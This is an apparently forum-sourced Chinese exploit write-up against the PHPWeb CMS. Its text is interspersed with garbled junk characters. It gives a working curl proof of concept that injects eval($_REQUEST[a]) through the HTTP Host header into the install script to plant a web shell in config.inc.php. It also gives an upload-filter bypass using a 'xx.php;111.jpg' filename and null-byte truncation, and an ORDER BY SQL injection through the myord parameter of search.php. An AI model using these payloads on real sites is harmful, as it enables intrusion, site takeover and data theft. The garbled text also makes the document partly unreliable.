phpweb成品网站最新版(注入、上传、写shell)

admin

注入：
" o# Y5 M; ^6 v7 n7 i
之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码
* C  W+ x4 ?% j# D) |3 l! N5 m
鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
3 r4 K7 i* n  [! I1 y2 C5 J2 ]鸡肋2： 有一定安全常识的站长都会删掉 install 目录
3 w/ {( F. x$ \4 [
虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响

分析：


$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤
! y2 o( ^' }5 f# g: _% {# M
. Z8 x' {' b9 B, d+ V; S                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
1 Y4 R8 P9 p# ^& B' V                                            $filestr=str_replace(" ","",$filestr);
                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
: [' s4 A' K1 e$ M/ @' Q                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
& n( R4 z& p- K7 n; e                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

poc：
+ [  m% O2 ~* n+ Q& @
. Y; \( @" o: N: |! V?
1
3 t& _  p- Z  K& \: X: Y8 v# j1 ^curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
  |1 F& _) ~% tshell地址: /config.inc.php
( S( ~$ O0 `! A9 O$ }; N( O% C0 U跟之前的 phpcms一样 需要远程数据库
$ U. ]4 J7 W5 V! V! e
——————————————————–
1 |8 X# ?; s" H& J/ t上传漏洞(需要进后台)：
漏洞文件: /kedit/upload_cgi/upload.php
3 E9 h0 ]* V9 j这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用
! s, v! L" j9 x; X! D# K1 s" e' N: q
0 a4 U. Q) o/ |7 Z! Y
/ k4 g0 K" B9 W1 I! V9 e( h; _<?php
. n, h2 r2 v; k! x0 T4 @    define("ROOTPATH", "../../");
    include(ROOTPATH."includes/admin.inc.php");
    NeedAuth(0);

1 [9 k* {8 s2 Y! s6 Y  q" p    $dt=date("Ymd",time());
' T" e: `: b' k    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
    }

    //文件保存目录路径
: x% l7 g  {# K/ F    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
    echo $save_path;
    //文件保存目录URL
    $save_url = '../../'.$_POST['attachPath'].$dt.'/';

    //定义允许上传的文件扩展名
0 g2 W% }: u' T8 C- n/ U' N    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀
- c6 U& `) {( L; s$ D
    //最大文件大小
    $max_size = 1000000;
# x( M9 s% E% r) f
    //更改目录权限
- m. X2 c& _) K$ ?( O: v) b    @mkdir($save_path, 0777);
( h( ]" n" M! d. d3 `7 e$ e6 Z
    //文件的全部路径
* k5 g. A! \0 _    $file_path = $save_path.$_POST['fileName'];   //保存文件名
. O+ K2 I: J& X+ B
' A$ _/ C7 u# U8 I& w+ r    //文件URL
( }8 h8 Q# ^/ Q5 t    $file_url = $save_url.$_POST['fileName'];
//有上传文件时
0 w9 A8 a5 N, A( `8 z% W    if (empty($_FILES) === false) {

5 J: v" w( I  J8 o  M3 n            //原文件名
            $file_name = $_FILES['fileData']['name'];
            //服务器上临时文件名
            $tmp_name = $_FILES['fileData']['tmp_name'];
            //文件大小
            $file_size = $_FILES['fileData']['size'];
            //检查目录
            if (@is_dir($save_path) === false) {
                    alert("上传目录不存在。");
2 z2 K. s4 `8 ^8 H            }
* C" `6 u1 A; C6 g( P7 Z            //检查目录写权限
            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
            }
            //检查是否已上传
6 a( V* _+ J: f3 h8 W: ?- o! l            if (@is_uploaded_file($tmp_name) === false) {
9 _* q: g0 x7 [9 \! l2 c3 T$ ?                    alert("临时文件可能不是上传文件。");
' n. C* t; t; K; y            }
            //检查文件大小
  _8 N$ e5 w% T2 S1 P9 u' l. j$ ~            if ($file_size > $max_size) {
                    alert("上传文件大小超过限制。");
            }
) x7 M, y. y; c( H5 h9 ^' M, u' b5 X            //获得文件扩展名
            $temp_arr = explode(".", $_POST['fileName']);
- ^( w) f" n8 s5 m            $file_ext = array_pop($temp_arr);
) ~- Y5 b  I. ?  ~9 R5 ?8 f( }            $file_ext = trim($file_ext);
# p  V# @9 p8 q) a            $file_ext = strtolower($file_ext);
( P( \7 z# z5 Z& \5 Y
            //检查扩展名   
            if (in_array($file_ext, $ext_arr) === false) {     
                    alert("上传文件扩展名是不允许的扩展名。");
7 f  ^0 \9 }4 J, ^            }
; A4 {. H( O  C' p6 Q
            //移动文件   
- _0 }3 f- ~) a3 I' E            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
            if (move_uploaded_file($tmp_name, $file_path) === false) {
                    alert("上传文件失败。");
8 t) Q8 x+ o0 U5 A            }
3 _7 v9 P7 g4 [% Q3 w
# l) V9 z! W4 G/ y1 q5 i& G            @chmod($file_path,0666);
8 m/ c5 m- V* f" k
    ?>
( `0 ~! C, ^( r/ Q抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227
5 U3 L" {5 G# q' w3 Q
apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

——————————————————
注入漏洞：
漏洞文件:search/module/search.php
/search/index.php?key=1&myord=1 [sqlinjection]
  ~9 F: c3 L1 U# X/ n

<?php
   //       ... 省略 n 行...
4 z5 X/ ~; F0 W( b   //第18行:
           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
$ @4 W1 S& k* K. V5 d           $page=htmlspecialchars($_GET["page"]);
           $myord=htmlspecialchars($_GET["myord"]);
+ q1 B6 K1 J5 k4 a
  O! S) I+ R& H% j4 }   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
, t# q! K0 z  a, b" `. v4 }1 I   //第47行 $key:

  j8 P4 B. z" e$ d+ N   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..

! d! y/ E  _( w, E1 c0 b   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入
, O+ K3 ?+ G2 M# y4 z2 b7 k+ T2 O
   ?>
" Y/ n; o4 V! G: u- n